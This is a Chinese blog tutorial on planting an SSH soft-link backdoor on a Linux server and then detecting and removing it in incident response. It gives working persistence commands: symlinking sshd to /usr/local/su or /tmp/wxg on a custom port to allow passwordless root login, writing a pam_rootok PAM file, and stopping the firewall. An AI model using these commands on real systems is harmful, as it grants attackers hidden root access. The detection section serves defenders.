LINUX留后门--教程(二)—— SSH软链接后门

W小哥
930 阅读2分钟

一、本教程作用

1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防

二、SSH软链接后门-教程

前提条件:  假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
环境:  一台开启ssh的任意Linux服务器就可以(我用的虚拟机)

在目标服务器上执行命令:

1、第一种:创建root账户 ssh软链接后门命令:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 #ssh软链接
systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上

image.png

连接软链接后门测试:
此处密码可以随意

ssh root@XXX.XXX.XXX.XXX -p 12345

image.png

2、第二种:创建其它账户 ssh软连接后门命令
前提:  服务器存在普通账户wxg

第一步执行以下命令:
echo " 
 #%PAM-1.0
 auth       sufficient   pam_rootok.so
 auth       include      system-auth
 account    include      system-auth
 password   include      system-auth
 session    include      system-auth " >> /etc/pam.d/wxg

第二步执行开启软链接命令
ln -sf /usr/sbin/sshd /tmp/wxg;/tmp/wxg -oPort=14725

systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上

image.png

kali远程连接wxg账户测试成功

image.png

三、SSH软链接后门——应急响应发现

第一步:查看服务器开放的端口号

netstat -anpt

发现开启有12345、14725异常端口,且名字为su、wxg,且su的PID 为7702

image.png 查看PID 7702所使用的程序为ssh

ll /proc/7702

image.png

第二步:确定软链接后门文件

查看所有的su文件,以及查找具体哪一个su是软链接后门

find -name su
ll /usr/share/bash-completion/completions/su
ll /usr/local/su

image.png 最终确定软链接为:/usr/local/su

第三步:删除软链接后门

rm -rf   /usr/local/su
kill -9 7702

image.png

切记:  不要用 rm -rf /usr/local/su/,如果后面多一个斜杠,就会把文件删除!

image.png 软链接被成功清除,登录不上了

image.png

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥\

image.png

avatar
文章
阅读
粉丝